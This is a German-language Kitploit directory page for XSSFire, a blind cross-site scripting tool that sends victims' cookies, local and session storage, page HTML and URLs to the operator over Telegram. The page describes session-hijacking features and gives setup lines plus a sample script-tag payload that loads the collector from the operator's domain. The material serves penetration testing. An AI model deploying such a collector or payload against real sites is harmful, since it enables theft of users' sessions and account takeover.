Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
XSSFire — A standalone Blind XSS Script. | Kitploit
Tools/GitHubGitHub/seifelsallamy/xssfire
ExploitationWeb Application ExploitationData ExfiltrationInformation GatheringWeb SecurityPenetration Testing
GitHubseifelsallamy/xssfire

XSSFire

A standalone Blind XSS Script.

Repository anzeigen
4710vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

XSSFire

Ein eigenständiges Blind-XSS-Skript.

So funktioniert's:

Das Skript ist eine Kombination aus PHP und JavaScript. Es erfasst die Daten mithilfe von JS und sendet sie an das Skript selbst, generiert dann Berichtsdateien und liefert sie über Telegram.

Anforderungen:

  1. Webserver, der unter Linux mit einer Domain und einem SSL-Zertifikat läuft.
  2. Telegram-Konto (um BXSS-Berichte zu empfangen)

Warum Telegram?

Einfach einzurichten. Schnell. Erreichbar.

Funktionen:

  1. Erfasst: IP, User-Agent, Datum/Uhrzeit, Local Storage, Session Storage, Cookies, Referrer, Origin, URL, HTML, wenn von einem Iframe ausgelöst
  2. Session Builder: Ein JavaScript, das die Sitzung wiederherstellen kann. Öffne die erfasste URL und die Devtools, füge es dann in der Konsole ein und drücke Enter. Wenn du genug Glück hast, kannst du die Sitzung übernehmen.
  3. Telegram-Benachrichtigungen: Schneller und einfacher einzurichten als E-Mails und besser erreichbar.
  4. Anti-Spam: Du solltest nur eine oder zwei Benachrichtigungen für jede erfasste URL erhalten. Das Skript setzt jedoch von Zeit zu Zeit zurück, um dich später erneut zu benachrichtigen.
  5. Verschlüsselung: Du kannst im Skript ein Passwort festlegen, und der Bericht, den du in Telegram erhältst, ist eine passwortgeschützte ZIP-Datei. (Telegram-Bots verwenden keine Ende-zu-Ende-Verschlüsselung.)
  6. HTML-Snapshot: Eine HTML-Datei, die mit dem Bericht geliefert wird. Sie sollte der Seite deines Ziels ähnlich sehen.

Einrichtung:

  1. Gehe zu Telegram und chatte mit dem @botfather.
  2. Schreibe /start in den Chat und erstelle einen neuen Bot.
  3. Du solltest dein Bot-Token erhalten, wenn du den Bot erstellst.
  4. Bewahre das Token auf.
  5. Gehe nun zu dem Chat deines neu erstellten Bots, starte ihn und sag Hallo.
  6. Gehe dann zu: https://api.telegram.org/bot<bot_token>/getUpdates
  7. Und speichere deine Chat-ID.
  8. Öffne das XSSFire-Skript und ändere die folgenden Zeilen:
root@kitploit:~
$chat_id = "<Telegram Chat ID>"; // Your Telegram Chat ID
$token = "<Telegram Bot Access Token>"; // Your telegram Bot Access token
$password = False; //Protect the Blind XSS Report with a password. Leave as False if not used.
  1. Lade das Skript auf deinen Server hoch.

Zum Generieren von Payloads kannst du den Blind-XSS-Manager in Betracht ziehen: https://github.com/SeifElsallamy/Blind-XSS-Manager Du kannst einfach Payloads über diese Erweiterung erstellen, indem du yourdomain.com/

Hinweis: Du kannst den Dateinamen in index.php ändern und ihn in das Hauptverzeichnis deines Servers hochladen, um die Payloads zu verkürzen. Die Payload sollte dann ähnlich wie <script src="https://yourdomain.com"></script> aussehen.

Screenshots:

bxss bxss2 bxss3

Danke an GPT-3 xD

Tool herunterladen